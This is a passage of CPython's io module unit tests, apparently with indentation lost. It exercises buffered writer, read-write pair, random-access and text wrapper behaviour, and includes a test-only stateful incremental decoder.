bufio = self.tp(writer, 8)
contents = b"abcdefghijklmnop"
for n in range(0, len(contents), 3):
bufio.write(contents[n:n+3])
flushed = b"".join(writer._write_stack)
# At least (total - 8) bytes were implicitly flushed, perhaps more
# depending on the implementation.
self.assertTrue(flushed.startswith(contents[:-8]), flushed)
def check_writes(self, intermediate_func):
# Lots of writes, test the flushed output is as expected.
contents = bytes(range(256)) * 1000
n = 0
writer = self.MockRawIO()
bufio = self.tp(writer, 13)
# Generator of write sizes: repeat each N 15 times then proceed to N+1
def gen_sizes():
for size in count(1):
for i in range(15):
yield size
sizes = gen_sizes()
while n < len(contents):
size = min(next(sizes), len(contents) - n)
self.assertEqual(bufio.write(contents[n:n+size]), size)
intermediate_func(bufio)
n += size
bufio.flush()
self.assertEqual(contents, b"".join(writer._write_stack))
def test_writes(self):
self.check_writes(lambda bufio: None)
def test_writes_and_flushes(self):
self.check_writes(lambda bufio: bufio.flush())
def test_writes_and_seeks(self):
def _seekabs(bufio):
pos = bufio.tell()
bufio.seek(pos + 1, 0)
bufio.seek(pos - 1, 0)
bufio.seek(pos, 0)
self.check_writes(_seekabs)
def _seekrel(bufio):
pos = bufio.seek(0, 1)
bufio.seek(+1, 1)
bufio.seek(-1, 1)
bufio.seek(pos, 0)
self.check_writes(_seekrel)
def test_writes_and_truncates(self):
self.check_writes(lambda bufio: bufio.truncate(bufio.tell()))
def test_write_non_blocking(self):
raw = self.MockNonBlockWriterIO()
bufio = self.tp(raw, 8)
self.assertEqual(bufio.write(b"abcd"), 4)
self.assertEqual(bufio.write(b"efghi"), 5)
# 1 byte will be written, the rest will be buffered
raw.block_on(b"k")
self.assertEqual(bufio.write(b"jklmn"), 5)
# 8 bytes will be written, 8 will be buffered and the rest will be lost
raw.block_on(b"0")
try:
bufio.write(b"opqrwxyz0123456789")
except self.BlockingIOError as e:
written = e.characters_written
else:
self.fail("BlockingIOError should have been raised")
self.assertEqual(written, 16)
self.assertEqual(raw.pop_written(),
b"abcdefghijklmnopqrwxyz")
self.assertEqual(bufio.write(b"ABCDEFGHI"), 9)
s = raw.pop_written()
# Previously buffered bytes were flushed
self.assertTrue(s.startswith(b"01234567A"), s)
def test_write_and_rewind(self):
raw = io.BytesIO()
bufio = self.tp(raw, 4)
self.assertEqual(bufio.write(b"abcdef"), 6)
self.assertEqual(bufio.tell(), 6)
bufio.seek(0, 0)
self.assertEqual(bufio.write(b"XY"), 2)
bufio.seek(6, 0)
self.assertEqual(raw.getvalue(), b"XYcdef")
self.assertEqual(bufio.write(b"123456"), 6)
bufio.flush()
self.assertEqual(raw.getvalue(), b"XYcdef123456")
def test_flush(self):
writer = self.MockRawIO()
bufio = self.tp(writer, 8)
bufio.write(b"abc")
bufio.flush()
self.assertEqual(b"abc", writer._write_stack[0])
def test_writelines(self):
l = [b'ab', b'cd', b'ef']
writer = self.MockRawIO()
bufio = self.tp(writer, 8)
bufio.writelines(l)
bufio.flush()
self.assertEqual(b''.join(writer._write_stack), b'abcdef')
def test_writelines_userlist(self):
l = UserList([b'ab', b'cd', b'ef'])
writer = self.MockRawIO()
bufio = self.tp(writer, 8)
bufio.writelines(l)
bufio.flush()
self.assertEqual(b''.join(writer._write_stack), b'abcdef')
def test_writelines_error(self):
writer = self.MockRawIO()
bufio = self.tp(writer, 8)
self.assertRaises(TypeError, bufio.writelines, [1, 2, 3])
self.assertRaises(TypeError, bufio.writelines, None)
self.assertRaises(TypeError, bufio.writelines, 'abc')
def test_destructor(self):
writer = self.MockRawIO()
bufio = self.tp(writer, 8)
bufio.write(b"abc")
del bufio
support.gc_collect()
self.assertEqual(b"abc", writer._write_stack[0])
def test_truncate(self):
# Truncate implicitly flushes the buffer.
self.addCleanup(support.unlink, support.TESTFN)
with self.open(support.TESTFN, self.write_mode, buffering=0) as raw:
bufio = self.tp(raw, 8)
bufio.write(b"abcdef")
self.assertEqual(bufio.truncate(3), 3)
self.assertEqual(bufio.tell(), 6)
with self.open(support.TESTFN, "rb", buffering=0) as f:
self.assertEqual(f.read(), b"abc")
def test_truncate_after_write(self):
# Ensure that truncate preserves the file position after
# writes longer than the buffer size.
# Issue: https://bugs.python.org/issue32228
self.addCleanup(support.unlink, support.TESTFN)
with self.open(support.TESTFN, "wb") as f:
# Fill with some buffer
f.write(b'\x00' * 10000)
buffer_sizes = [8192, 4096, 200]
for buffer_size in buffer_sizes:
with self.open(support.TESTFN, "r+b", buffering=buffer_size) as f:
f.write(b'\x00' * (buffer_size + 1))
# After write write_pos and write_end are set to 0
f.read(1)
# read operation makes sure that pos != raw_pos
f.truncate()
self.assertEqual(f.tell(), buffer_size + 2)
@support.requires_resource('cpu')
def test_threads(self):
try:
# Write out many bytes from many threads and test they were
# all flushed.
N = 1000
contents = bytes(range(256)) * N
sizes = cycle([1, 19])
n = 0
queue = deque()
while n < len(contents):
size = next(sizes)
queue.append(contents[n:n+size])
n += size
del contents
# We use a real file object because it allows us to
# exercise situations where the GIL is released before
# writing the buffer to the raw streams. This is in addition
# to concurrency issues due to switching threads in the middle
# of Python code.
with self.open(support.TESTFN, self.write_mode, buffering=0) as raw:
bufio = self.tp(raw, 8)
errors = []
def f():
try:
while True:
try:
s = queue.popleft()
except IndexError:
return
bufio.write(s)
except Exception as e:
errors.append(e)
raise
threads = [threading.Thread(target=f) for x in range(20)]
with support.start_threads(threads):
time.sleep(0.02) # yield
self.assertFalse(errors,
"the following exceptions were caught: %r" % errors)
bufio.close()
with self.open(support.TESTFN, "rb") as f:
s = f.read()
for i in range(256):
self.assertEqual(s.count(bytes([i])), N)
finally:
support.unlink(support.TESTFN)
def test_misbehaved_io(self):
rawio = self.MisbehavedRawIO()
bufio = self.tp(rawio, 5)
self.assertRaises(OSError, bufio.seek, 0)
self.assertRaises(OSError, bufio.tell)
self.assertRaises(OSError, bufio.write, b"abcdef")
def test_max_buffer_size_removal(self):
with self.assertRaises(TypeError):
self.tp(self.MockRawIO(), 8, 12)
def test_write_error_on_close(self):
raw = self.MockRawIO()
def bad_write(b):
raise OSError()
raw.write = bad_write
b = self.tp(raw)
b.write(b'spam')
self.assertRaises(OSError, b.close) # exception not swallowed
self.assertTrue(b.closed)
def test_slow_close_from_thread(self):
# Issue #31976
rawio = self.SlowFlushRawIO()
bufio = self.tp(rawio, 8)
t = threading.Thread(target=bufio.close)
t.start()
rawio.in_flush.wait()
self.assertRaises(ValueError, bufio.write, b'spam')
self.assertTrue(bufio.closed)
t.join()
class CBufferedWriterTest(BufferedWriterTest, SizeofTest):
tp = io.BufferedWriter
def test_constructor(self):
BufferedWriterTest.test_constructor(self)
# The allocation can succeed on 32-bit builds, e.g. with more
# than 2 GiB RAM and a 64-bit kernel.
if sys.maxsize > 0x7FFFFFFF:
rawio = self.MockRawIO()
bufio = self.tp(rawio)
self.assertRaises((OverflowError, MemoryError, ValueError),
bufio.__init__, rawio, sys.maxsize)
def test_initialization(self):
rawio = self.MockRawIO()
bufio = self.tp(rawio)
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=0)
self.assertRaises(ValueError, bufio.write, b"def")
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-16)
self.assertRaises(ValueError, bufio.write, b"def")
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-1)
self.assertRaises(ValueError, bufio.write, b"def")
def test_garbage_collection(self):
# C BufferedWriter objects are collected, and collecting them flushes
# all data to disk.
# The Python version has __del__, so it ends into gc.garbage instead
self.addCleanup(support.unlink, support.TESTFN)
with support.check_warnings(('', ResourceWarning)):
rawio = self.FileIO(support.TESTFN, "w+b")
f = self.tp(rawio)
f.write(b"123xxx")
f.x = f
wr = weakref.ref(f)
del f
support.gc_collect()
self.assertIsNone(wr(), wr)
with self.open(support.TESTFN, "rb") as f:
self.assertEqual(f.read(), b"123xxx")
def test_args_error(self):
# Issue #17275
with self.assertRaisesRegex(TypeError, "BufferedWriter"):
self.tp(io.BytesIO(), 1024, 1024, 1024)
class PyBufferedWriterTest(BufferedWriterTest):
tp = pyio.BufferedWriter
class BufferedRWPairTest(unittest.TestCase):
def test_constructor(self):
pair = self.tp(self.MockRawIO(), self.MockRawIO())
self.assertFalse(pair.closed)
def test_uninitialized(self):
pair = self.tp.__new__(self.tp)
del pair
pair = self.tp.__new__(self.tp)
self.assertRaisesRegex((ValueError, AttributeError),
'uninitialized|has no attribute',
pair.read, 0)
self.assertRaisesRegex((ValueError, AttributeError),
'uninitialized|has no attribute',
pair.write, b'')
pair.__init__(self.MockRawIO(), self.MockRawIO())
self.assertEqual(pair.read(0), b'')
self.assertEqual(pair.write(b''), 0)
def test_detach(self):
pair = self.tp(self.MockRawIO(), self.MockRawIO())
self.assertRaises(self.UnsupportedOperation, pair.detach)
def test_constructor_max_buffer_size_removal(self):
with self.assertRaises(TypeError):
self.tp(self.MockRawIO(), self.MockRawIO(), 8, 12)
def test_constructor_with_not_readable(self):
class NotReadable(MockRawIO):
def readable(self):
return False
self.assertRaises(OSError, self.tp, NotReadable(), self.MockRawIO())
def test_constructor_with_not_writeable(self):
class NotWriteable(MockRawIO):
def writable(self):
return False
self.assertRaises(OSError, self.tp, self.MockRawIO(), NotWriteable())
def test_read(self):
pair = self.tp(self.BytesIO(b"abcdef"), self.MockRawIO())
self.assertEqual(pair.read(3), b"abc")
self.assertEqual(pair.read(1), b"d")
self.assertEqual(pair.read(), b"ef")
pair = self.tp(self.BytesIO(b"abc"), self.MockRawIO())
self.assertEqual(pair.read(None), b"abc")
def test_readlines(self):
pair = lambda: self.tp(self.BytesIO(b"abc\ndef\nh"), self.MockRawIO())
self.assertEqual(pair().readlines(), [b"abc\n", b"def\n", b"h"])
self.assertEqual(pair().readlines(), [b"abc\n", b"def\n", b"h"])
self.assertEqual(pair().readlines(5), [b"abc\n", b"def\n"])
def test_read1(self):
# .read1() is delegated to the underlying reader object, so this test
# can be shallow.
pair = self.tp(self.BytesIO(b"abcdef"), self.MockRawIO())
self.assertEqual(pair.read1(3), b"abc")
self.assertEqual(pair.read1(), b"def")
def test_readinto(self):
for method in ("readinto", "readinto1"):
with self.subTest(method):
pair = self.tp(self.BytesIO(b"abcdef"), self.MockRawIO())
data = byteslike(b'\0' * 5)
self.assertEqual(getattr(pair, method)(data), 5)
self.assertEqual(bytes(data), b"abcde")
def test_write(self):
w = self.MockRawIO()
pair = self.tp(self.MockRawIO(), w)
pair.write(b"abc")
pair.flush()
buffer = bytearray(b"def")
pair.write(buffer)
buffer[:] = b"***" # Overwrite our copy of the data
pair.flush()
self.assertEqual(w._write_stack, [b"abc", b"def"])
def test_peek(self):
pair = self.tp(self.BytesIO(b"abcdef"), self.MockRawIO())
self.assertTrue(pair.peek(3).startswith(b"abc"))
self.assertEqual(pair.read(3), b"abc")
def test_readable(self):
pair = self.tp(self.MockRawIO(), self.MockRawIO())
self.assertTrue(pair.readable())
def test_writeable(self):
pair = self.tp(self.MockRawIO(), self.MockRawIO())
self.assertTrue(pair.writable())
def test_seekable(self):
# BufferedRWPairs are never seekable, even if their readers and writers
# are.
pair = self.tp(self.MockRawIO(), self.MockRawIO())
self.assertFalse(pair.seekable())
# .flush() is delegated to the underlying writer object and has been
# tested in the test_write method.
def test_close_and_closed(self):
pair = self.tp(self.MockRawIO(), self.MockRawIO())
self.assertFalse(pair.closed)
pair.close()
self.assertTrue(pair.closed)
def test_reader_close_error_on_close(self):
def reader_close():
reader_non_existing
reader = self.MockRawIO()
reader.close = reader_close
writer = self.MockRawIO()
pair = self.tp(reader, writer)
with self.assertRaises(NameError) as err:
pair.close()
self.assertIn('reader_non_existing', str(err.exception))
self.assertTrue(pair.closed)
self.assertFalse(reader.closed)
self.assertTrue(writer.closed)
def test_writer_close_error_on_close(self):
def writer_close():
writer_non_existing
reader = self.MockRawIO()
writer = self.MockRawIO()
writer.close = writer_close
pair = self.tp(reader, writer)
with self.assertRaises(NameError) as err:
pair.close()
self.assertIn('writer_non_existing', str(err.exception))
self.assertFalse(pair.closed)
self.assertTrue(reader.closed)
self.assertFalse(writer.closed)
def test_reader_writer_close_error_on_close(self):
def reader_close():
reader_non_existing
def writer_close():
writer_non_existing
reader = self.MockRawIO()
reader.close = reader_close
writer = self.MockRawIO()
writer.close = writer_close
pair = self.tp(reader, writer)
with self.assertRaises(NameError) as err:
pair.close()
self.assertIn('reader_non_existing', str(err.exception))
self.assertIsInstance(err.exception.__context__, NameError)
self.assertIn('writer_non_existing', str(err.exception.__context__))
self.assertFalse(pair.closed)
self.assertFalse(reader.closed)
self.assertFalse(writer.closed)
def test_isatty(self):
class SelectableIsAtty(MockRawIO):
def __init__(self, isatty):
MockRawIO.__init__(self)
self._isatty = isatty
def isatty(self):
return self._isatty
pair = self.tp(SelectableIsAtty(False), SelectableIsAtty(False))
self.assertFalse(pair.isatty())
pair = self.tp(SelectableIsAtty(True), SelectableIsAtty(False))
self.assertTrue(pair.isatty())
pair = self.tp(SelectableIsAtty(False), SelectableIsAtty(True))
self.assertTrue(pair.isatty())
pair = self.tp(SelectableIsAtty(True), SelectableIsAtty(True))
self.assertTrue(pair.isatty())
def test_weakref_clearing(self):
brw = self.tp(self.MockRawIO(), self.MockRawIO())
ref = weakref.ref(brw)
brw = None
ref = None # Shouldn't segfault.
class CBufferedRWPairTest(BufferedRWPairTest):
tp = io.BufferedRWPair
class PyBufferedRWPairTest(BufferedRWPairTest):
tp = pyio.BufferedRWPair
class BufferedRandomTest(BufferedReaderTest, BufferedWriterTest):
read_mode = "rb+"
write_mode = "wb+"
def test_constructor(self):
BufferedReaderTest.test_constructor(self)
BufferedWriterTest.test_constructor(self)
def test_uninitialized(self):
BufferedReaderTest.test_uninitialized(self)
BufferedWriterTest.test_uninitialized(self)
def test_read_and_write(self):
raw = self.MockRawIO((b"asdf", b"ghjk"))
rw = self.tp(raw, 8)
self.assertEqual(b"as", rw.read(2))
rw.write(b"ddd")
rw.write(b"eee")
self.assertFalse(raw._write_stack) # Buffer writes
self.assertEqual(b"ghjk", rw.read())
self.assertEqual(b"dddeee", raw._write_stack[0])
def test_seek_and_tell(self):
raw = self.BytesIO(b"asdfghjkl")
rw = self.tp(raw)
self.assertEqual(b"as", rw.read(2))
self.assertEqual(2, rw.tell())
rw.seek(0, 0)
self.assertEqual(b"asdf", rw.read(4))
rw.write(b"123f")
rw.seek(0, 0)
self.assertEqual(b"asdf123fl", rw.read())
self.assertEqual(9, rw.tell())
rw.seek(-4, 2)
self.assertEqual(5, rw.tell())
rw.seek(2, 1)
self.assertEqual(7, rw.tell())
self.assertEqual(b"fl", rw.read(11))
rw.flush()
self.assertEqual(b"asdf123fl", raw.getvalue())
self.assertRaises(TypeError, rw.seek, 0.0)
def check_flush_and_read(self, read_func):
raw = self.BytesIO(b"abcdefghi")
bufio = self.tp(raw)
self.assertEqual(b"ab", read_func(bufio, 2))
bufio.write(b"12")
self.assertEqual(b"ef", read_func(bufio, 2))
self.assertEqual(6, bufio.tell())
bufio.flush()
self.assertEqual(6, bufio.tell())
self.assertEqual(b"ghi", read_func(bufio))
raw.seek(0, 0)
raw.write(b"XYZ")
# flush() resets the read buffer
bufio.flush()
bufio.seek(0, 0)
self.assertEqual(b"XYZ", read_func(bufio, 3))
def test_flush_and_read(self):
self.check_flush_and_read(lambda bufio, *args: bufio.read(*args))
def test_flush_and_readinto(self):
def _readinto(bufio, n=-1):
b = bytearray(n if n >= 0 else 9999)
n = bufio.readinto(b)
return bytes(b[:n])
self.check_flush_and_read(_readinto)
def test_flush_and_peek(self):
def _peek(bufio, n=-1):
# This relies on the fact that the buffer can contain the whole
# raw stream, otherwise peek() can return less.
b = bufio.peek(n)
if n != -1:
b = b[:n]
bufio.seek(len(b), 1)
return b
self.check_flush_and_read(_peek)
def test_flush_and_write(self):
raw = self.BytesIO(b"abcdefghi")
bufio = self.tp(raw)
bufio.write(b"123")
bufio.flush()
bufio.write(b"45")
bufio.flush()
bufio.seek(0, 0)
self.assertEqual(b"12345fghi", raw.getvalue())
self.assertEqual(b"12345fghi", bufio.read())
def test_threads(self):
BufferedReaderTest.test_threads(self)
BufferedWriterTest.test_threads(self)
def test_writes_and_peek(self):
def _peek(bufio):
bufio.peek(1)
self.check_writes(_peek)
def _peek(bufio):
pos = bufio.tell()
bufio.seek(-1, 1)
bufio.peek(1)
bufio.seek(pos, 0)
self.check_writes(_peek)
def test_writes_and_reads(self):
def _read(bufio):
bufio.seek(-1, 1)
bufio.read(1)
self.check_writes(_read)
def test_writes_and_read1s(self):
def _read1(bufio):
bufio.seek(-1, 1)
bufio.read1(1)
self.check_writes(_read1)
def test_writes_and_readintos(self):
def _read(bufio):
bufio.seek(-1, 1)
bufio.readinto(bytearray(1))
self.check_writes(_read)
def test_write_after_readahead(self):
# Issue #6629: writing after the buffer was filled by readahead should
# first rewind the raw stream.
for overwrite_size in [1, 5]:
raw = self.BytesIO(b"A" * 10)
bufio = self.tp(raw, 4)
# Trigger readahead
self.assertEqual(bufio.read(1), b"A")
self.assertEqual(bufio.tell(), 1)
# Overwriting should rewind the raw stream if it needs so
bufio.write(b"B" * overwrite_size)
self.assertEqual(bufio.tell(), overwrite_size + 1)
# If the write size was smaller than the buffer size, flush() and
# check that rewind happens.
bufio.flush()
self.assertEqual(bufio.tell(), overwrite_size + 1)
s = raw.getvalue()
self.assertEqual(s,
b"A" + b"B" * overwrite_size + b"A" * (9 - overwrite_size))
def test_write_rewind_write(self):
# Various combinations of reading / writing / seeking backwards / writing again
def mutate(bufio, pos1, pos2):
assert pos2 >= pos1
# Fill the buffer
bufio.seek(pos1)
bufio.read(pos2 - pos1)
bufio.write(b'\x02')
# This writes earlier than the previous write, but still inside
# the buffer.
bufio.seek(pos1)
bufio.write(b'\x01')
b = b"\x80\x81\x82\x83\x84"
for i in range(0, len(b)):
for j in range(i, len(b)):
raw = self.BytesIO(b)
bufio = self.tp(raw, 100)
mutate(bufio, i, j)
bufio.flush()
expected = bytearray(b)
expected[j] = 2
expected[i] = 1
self.assertEqual(raw.getvalue(), expected,
"failed result for i=%d, j=%d" % (i, j))
def test_truncate_after_read_or_write(self):
raw = self.BytesIO(b"A" * 10)
bufio = self.tp(raw, 100)
self.assertEqual(bufio.read(2), b"AA") # the read buffer gets filled
self.assertEqual(bufio.truncate(), 2)
self.assertEqual(bufio.write(b"BB"), 2) # the write buffer increases
self.assertEqual(bufio.truncate(), 4)
def test_misbehaved_io(self):
BufferedReaderTest.test_misbehaved_io(self)
BufferedWriterTest.test_misbehaved_io(self)
def test_interleaved_read_write(self):
# Test for issue #12213
with self.BytesIO(b'abcdefgh') as raw:
with self.tp(raw, 100) as f:
f.write(b"1")
self.assertEqual(f.read(1), b'b')
f.write(b'2')
self.assertEqual(f.read1(1), b'd')
f.write(b'3')
buf = bytearray(1)
f.readinto(buf)
self.assertEqual(buf, b'f')
f.write(b'4')
self.assertEqual(f.peek(1), b'h')
f.flush()
self.assertEqual(raw.getvalue(), b'1b2d3f4h')
with self.BytesIO(b'abc') as raw:
with self.tp(raw, 100) as f:
self.assertEqual(f.read(1), b'a')
f.write(b"2")
self.assertEqual(f.read(1), b'c')
f.flush()
self.assertEqual(raw.getvalue(), b'a2c')
def test_interleaved_readline_write(self):
with self.BytesIO(b'ab\ncdef\ng\n') as raw:
with self.tp(raw) as f:
f.write(b'1')
self.assertEqual(f.readline(), b'b\n')
f.write(b'2')
self.assertEqual(f.readline(), b'def\n')
f.write(b'3')
self.assertEqual(f.readline(), b'\n')
f.flush()
self.assertEqual(raw.getvalue(), b'1b\n2def\n3\n')
# You can't construct a BufferedRandom over a non-seekable stream.
test_unseekable = None
class CBufferedRandomTest(BufferedRandomTest, SizeofTest):
tp = io.BufferedRandom
def test_constructor(self):
BufferedRandomTest.test_constructor(self)
# The allocation can succeed on 32-bit builds, e.g. with more
# than 2 GiB RAM and a 64-bit kernel.
if sys.maxsize > 0x7FFFFFFF:
rawio = self.MockRawIO()
bufio = self.tp(rawio)
self.assertRaises((OverflowError, MemoryError, ValueError),
bufio.__init__, rawio, sys.maxsize)
def test_garbage_collection(self):
CBufferedReaderTest.test_garbage_collection(self)
CBufferedWriterTest.test_garbage_collection(self)
def test_args_error(self):
# Issue #17275
with self.assertRaisesRegex(TypeError, "BufferedRandom"):
self.tp(io.BytesIO(), 1024, 1024, 1024)
class PyBufferedRandomTest(BufferedRandomTest):
tp = pyio.BufferedRandom
# To fully exercise seek/tell, the StatefulIncrementalDecoder has these
# properties:
# - A single output character can correspond to many bytes of input.
# - The number of input bytes to complete the character can be
# undetermined until the last input byte is received.
# - The number of input bytes can vary depending on previous input.
# - A single input byte can correspond to many characters of output.
# - The number of output characters can be undetermined until the
# last input byte is received.
# - The number of output characters can vary depending on previous input.
class StatefulIncrementalDecoder(codecs.IncrementalDecoder):
"""
For testing seek/tell behavior with a stateful, buffering decoder.
Input is a sequence of words. Words may be fixed-length (length set
by input) or variable-length (period-terminated). In variable-length
mode, extra periods are ignored. Possible words are:
- 'i' followed by a number sets the input length, I (maximum 99).
When I is set to 0, words are space-terminated.
- 'o' followed by a number sets the output length, O (maximum 99).
- Any other word is converted into a word followed by a period on
the output. The output word consists of the input word truncated
or padded out with hyphens to make its length equal to O. If O
is 0, the word is output verbatim without truncating or padding.
I and O are initially set to 1. When I changes, any buffered input is
re-scanned according to the new I. EOF also terminates the last word.
"""
def __init__(self, errors='strict'):
codecs.IncrementalDecoder.__init__(self, errors)
self.reset()
def __repr__(self):
return '<SID %x>' % id(self)
def reset(self):
self.i = 1
self.o = 1
self.buffer = bytearray()
def getstate(self):
i, o = self.i ^ 1, self.o ^ 1 # so that flags = 0 after reset()
return bytes(self.buffer), i*100 + o
def setstate(self, state):
buffer, io = state
self.buffer = bytearray(buffer)
i, o = divmod(io, 100)
self.i, self.o = i ^ 1, o ^ 1
def decode(self, input, final=False):
output = ''
for b in input:
if self.i == 0: # variable-length, terminated with period
if b == ord('.'):
if self.buffer:
output += self.process_word()
else:
self.buffer.append(b)
else: # fixed-length, terminate after self.i bytes
self.buffer.append(b)
if len(self.buffer) == self.i:
output += self.process_word()
if final and self.buffer: # EOF terminates the last word
output += self.process_word()
return output
def process_word(self):
output = ''
if self.buffer[0] == ord('i'):
self.i = min(99, int(self.buffer[1:] or 0)) # set input length
elif self.buffer[0] == ord('o'):
self.o = min(99, int(self.buffer[1:] or 0)) # set output length
else:
output = self.buffer.decode('ascii')
if len(output) < self.o:
output += '-'*self.o # pad out with hyphens
if self.o:
output = output[:self.o] # truncate to output length
output += '.'
self.buffer = bytearray()
return output
codecEnabled = False
@classmethod
def lookupTestDecoder(cls, name):
if cls.codecEnabled and name == 'test_decoder':
latin1 = codecs.lookup('latin-1')
return codecs.CodecInfo(
name='test_decoder', encode=latin1.encode, decode=None,
incrementalencoder=None,
streamreader=None, streamwriter=None,
incrementaldecoder=cls)
# Register the previous decoder for testing.
# Disabled by default, tests will enable it.
codecs.register(StatefulIncrementalDecoder.lookupTestDecoder)
class StatefulIncrementalDecoderTest(unittest.TestCase):
"""
Make sure the StatefulIncrementalDecoder actually works.
"""
test_cases = [
# I=1, O=1 (fixed-length input == fixed-length output)
(b'abcd', False, 'a.b.c.d.'),
# I=0, O=0 (variable-length input, variable-length output)
(b'oiabcd', True, 'abcd.'),
# I=0, O=0 (should ignore extra periods)
(b'oi...abcd...', True, 'abcd.'),
# I=0, O=6 (variable-length input, fixed-length output)
(b'i.o6.x.xyz.toolongtofit.', False, 'x-----.xyz---.toolon.'),
# I=2, O=6 (fixed-length input < fixed-length output)
(b'i.i2.o6xyz', True, 'xy----.z-----.'),
# I=6, O=3 (fixed-length input > fixed-length output)
(b'i.o3.i6.abcdefghijklmnop', True, 'abc.ghi.mno.'),
# I=0, then 3; O=29, then 15 (with longer output)
(b'i.o29.a.b.cde.o15.abcdefghijabcdefghij.i3.a.b.c.d.ei00k.l.m', True,
'a----------------------------.' +
'b----------------------------.' +
'cde--------------------------.' +
'abcdefghijabcde.' +
'a.b------------.' +
'.c.------------.' +
'd.e------------.' +
'k--------------.' +
'l--------------.' +
'm--------------.')
]
def test_decoder(self):
# Try a few one-shot test cases.
for input, eof, output in self.test_cases:
d = StatefulIncrementalDecoder()
self.assertEqual(d.decode(input, eof), output)
# Also test an unfinished decode, followed by forcing EOF.
d = StatefulIncrementalDecoder()
self.assertEqual(d.decode(b'oiabcd'), '')
self.assertEqual(d.decode(b'', 1), 'abcd.')
class TextIOWrapperTest(unittest.TestCase):
def setUp(self):
self.testdata = b"AAA\r\nBBB\rCCC\r\nDDD\nEEE\r\n"
self.normalized = b"AAA\nBBB\nCCC\nDDD\nEEE\n".decode("ascii")
support.unlink(support.TESTFN)
def tearDown(self):
support.unlink(support.TESTFN)
def test_constructor(self):
r = self.BytesIO(b"\xc3\xa9\n\n")
b = self.BufferedReader(r, 1000)
t = self.TextIOWrapper(b)
t.__init__(b, encoding="latin-1", newline="\r\n")
self.assertEqual(t.encoding, "latin-1")
self.assertEqual(t.line_buffering, False)
t.__init__(b, encoding="utf-8", line_buffering=True)
self.assertEqual(t.encoding, "utf-8")
self.assertEqual(t.line_buffering, True)
self.assertEqual("\xe9\n", t.readline())
self.assertRaises(TypeError, t.__init__, b, newline=42)
self.assertRaises(ValueError, t.__init__, b, newline='xyzzy')
def test_uninitialized(self):
t = self.TextIOWrapper.__new__(self.TextIOWrapper)
del t
t = self.TextIOWrapper.__new__(self.TextIOWrapper)
self.assertRaises(Exception, repr, t)
self.assertRaisesRegex((ValueError, AttributeError),
'uninitialized|has no attribute',
t.read, 0)
t.__init__(self.MockRawIO())
self.assertEqual(t.read(0), '')
def test_non_text_encoding_codecs_are_rejected(self):
# Ensure the constructor complains if passed a codec that isn't
# marked as a text encoding
# http://bugs.python.org/issue20404
r = self.BytesIO()
b = self.BufferedWriter(r)
with self.assertRaisesRegex(LookupError, "is not a text encoding"):
self.TextIOWrapper(b, encoding="hex")
def test_detach(self):
r = self.BytesIO()
b = self.BufferedWriter(r)
t = self.TextIOWrapper(b)
self.assertIs(t.detach(), b)
t = self.TextIOWrapper(b, encoding="ascii")
t.write("howdy")
self.assertFalse(r.getvalue())
t.detach()
self.assertEqual(r.getvalue(), b"howdy")
self.assertRaises(ValueError, t.detach)
# Operations independent of the detached stream should still work
repr(t)
self.assertEqual(t.encoding, "ascii")
self.assertEqual(t.errors, "strict")
self.assertFalse(t.line_buffering)
self.assertFalse(t.write_through)
def test_repr(self):
raw = self.BytesIO("hello".encode("utf-8"))
b = self.BufferedReader(raw)
t = self.TextIOWrapper(b, encoding="utf-8")
modname = self.TextIOWrapper.__module__
self.assertEqual(repr(t),
"<%s.TextIOWrapper encoding='utf-8'>" % modname)
raw.name = "dummy"
self.assertEqual(repr(t),
"<%s.TextIOWrapper name='dummy' encoding='utf-8'>" % modname)
t.mode = "r"
self.assertEqual(repr(t),
"<%s.TextIOWrapper name='dummy' mode='r' encoding='utf-8'>" % modname)
raw.name = b"dummy"
self.assertEqual(repr(t),
"<%s.TextIOWrapper name=b'dummy' mode='r' encoding='utf-8'>" % modname)
t.buffer.detach()
repr(t) # Should not raise an exception
def test_recursive_repr(self):
# Issue #25455
raw = self.BytesIO()
t = self.TextIOWrapper(raw)
with support.swap_attr(raw, 'name', t):
try:
repr(t) # Should not crash
except RuntimeError:
pass
def test_line_buffering(self):
r = self.BytesIO()
b = self.BufferedWriter(r, 1000)
t = self.TextIOWrapper(b, newline="\n", line_buffering=True)
t.write("X")
self.assertEqual(r.getvalue(), b"") # No flush happened
t.write("Y\nZ")
self.assertEqual(r.getvalue(), b"XY\nZ") # All got flushed
t.write("A\rB")
self.assertEqual(r.getvalue(), b"XY\nZA\rB")
def test_reconfigure_line_buffering(self):
r = self.BytesIO()
b = self.BufferedWriter(r, 1000)
t = self.TextIOWrapper(b, newline="\n", line_buffering=False)
t.write("AB\nC")
self.assertEqual(r.getvalue(), b"")
t.reconfigure(line_buffering=True) # implicit flush
self.assertEqual(r.getvalue(), b"AB\nC")
t.write("DEF\nG")
self.assertEqual(r.getvalue(), b"AB\nCDEF\nG")
t.write("H")
self.assertEqual(r.getvalue(), b"AB\nCDEF\nG")
t.reconfigure(line_buffering=False) # implicit flush
self.assertEqual(r.getvalue(), b"AB\nCDEF\nGH")
t.write("IJ")
self.assertEqual(r.getvalue(), b"AB\nCDEF\nGH")
# Keeping default value
t.reconfigure()
t.reconfigure(line_buffering=None)
self.assertEqual(t.line_buffering, False)
t.reconfigure(line_buffering=True)
t.reconfigure()
t.reconfigure(line_buffering=None)
self.assertEqual(t.line_buffering, True)
@unittest.skipIf(sys.flags.utf8_mode, "utf-8 mode is enabled")
def test_default_encoding(self):
old_environ = dict(os.environ)
try:
# try to get a user preferred encoding different than the current
# locale encoding to check that TextIOWrapper() uses the current
# locale encoding and not the user preferred encoding
for key in ('LC_ALL', 'LANG', 'LC_CTYPE'):
if key in os.environ:
del os.environ[key]
current_locale_encoding = locale.getpreferredencoding(False)
b = self.BytesIO()
t = self.TextIOWrapper(b)
self.assertEqual(t.encoding, current_locale_encoding)
finally:
os.environ.clear()
os.environ.update(old_environ)
@support.cpython_only
@unittest.skipIf(sys.flags.utf8_mode, "utf-8 mode is enabled")
def test_device_encoding(self):
# Issue 15989
import _testcapi
b = self.BytesIO()
b.fileno = lambda: _testcapi.INT_MAX + 1
self.assertRaises(OverflowError, self.TextIOWrapper, b)
b.fileno = lambda: _testcapi.UINT_MAX + 1
self.assertRaises(OverflowError, self.TextIOWrapper, b)
def test_encoding(self):
# Check the encoding attribute is always set, and valid
b = self.BytesIO()
t = self.TextIOWrapper(b, encoding="utf-8")
self.assertEqual(t.encoding, "utf-8")
t = self.TextIOWrapper(b)
self.assertIsNotNone(t.encoding)
codecs.lookup(t.encoding)
